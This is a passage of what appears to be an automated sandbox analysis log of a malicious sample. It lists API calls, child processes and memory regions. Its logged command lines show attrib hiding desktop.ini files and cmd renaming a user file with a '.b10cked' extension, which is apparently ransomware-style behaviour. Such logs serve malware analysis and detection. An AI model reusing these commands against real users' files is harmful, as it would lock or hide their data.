dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0192.918] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26ebd0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0192.918] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26ebb4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26ebb4*=0x1a) returned 1 [0192.918] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.918] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0192.918] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.918] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: 
lpMode=0x4a9e41ac) returned 1 [0192.918] _get_osfhandle (_FileHandle=0) returned 0x3 [0192.918] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0192.918] SetConsoleInputExeNameW () returned 0x1 [0192.918] GetConsoleOutputCP () returned 0x1b5 [0192.918] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0192.918] SetThreadUILanguage (LangId=0x0) returned 0x409 [0192.918] exit (_Code=0) Process: id = "438" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e60" os_pid = "0xea0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "436" os_parent_pid = "0xa84" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28407 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28408 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28409 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28410 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 28411 start_va = 0xf90000 end_va = 0xf96fff entry_point = 0xf90000 region_type = mapped_file name = 
"attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 28412 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28413 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28414 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28415 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 28416 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28417 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28418 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28419 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 28420 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28421 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 28422 start_va = 0x6de70000 end_va = 0x6de8cfff entry_point = 0x6de70000 region_type = mapped_file name = "ulib.dll" filename 
= "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 28423 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28424 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28425 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28426 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28427 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28428 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28429 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28430 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28431 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 
region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28432 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28433 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28434 start_va = 0x2c0000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 28435 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28436 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 630 os_tid = 0xe38 Process: id = "439" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16b40" os_pid = "0xb58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "436" os_parent_pid = "0xa84" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28438 start_va = 
0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28439 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28440 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28441 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 28442 start_va = 0x630000 end_va = 0x636fff entry_point = 0x630000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 28443 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28444 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28445 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28446 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 28447 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28448 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28449 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000020000" filename = "" Region: id = 28450 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28451 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 28452 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 28453 start_va = 0x6de80000 end_va = 0x6de9cfff entry_point = 0x6de80000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 28454 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28455 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28456 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28457 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28458 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28459 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point 
= 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28460 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28461 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28462 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28463 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28464 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28465 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 28466 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28467 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 631 os_tid = 0xe60 Process: id = "440" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16b40" os_pid = "0xe0c" 
os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "436" os_parent_pid = "0xa84" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28468 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28469 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28470 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28471 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 28472 start_va = 0xbf0000 end_va = 0xbf6fff entry_point = 0xbf0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 28473 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28474 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28475 start_va = 0x7ffb0000 end_va = 
0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28476 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 28477 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28478 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28479 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28480 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28481 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 28482 start_va = 0x5b0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 28483 start_va = 0x6dc20000 end_va = 0x6dc3cfff entry_point = 0x6dc20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 28484 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28485 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28486 start_va = 0x76480000 end_va = 0x76489fff entry_point = 
0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28487 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28488 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28489 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28490 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28491 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28492 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28493 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28494 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28495 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 28496 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28497 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 632 os_tid = 0xd7c Process: id = "441" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16a20" os_pid = "0xe08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28523 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28524 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28525 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28526 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" 
filename = "" Region: id = 28527 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28528 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28529 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28530 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28531 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 28532 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28625 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28626 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28627 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28628 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 28629 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 
28630 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28631 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28632 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28633 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28634 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28635 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28636 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28637 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28638 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28639 start_va 
= 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 28640 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28641 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28642 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 28643 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 28644 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 28645 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 28646 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 28647 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 28648 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Region: id = 28650 start_va = 0x1330000 end_va = 0x13effff entry_point = 0x1330000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 634 os_tid = 0x728 [0194.389] GetSystemTimeAsFileTime (in: 
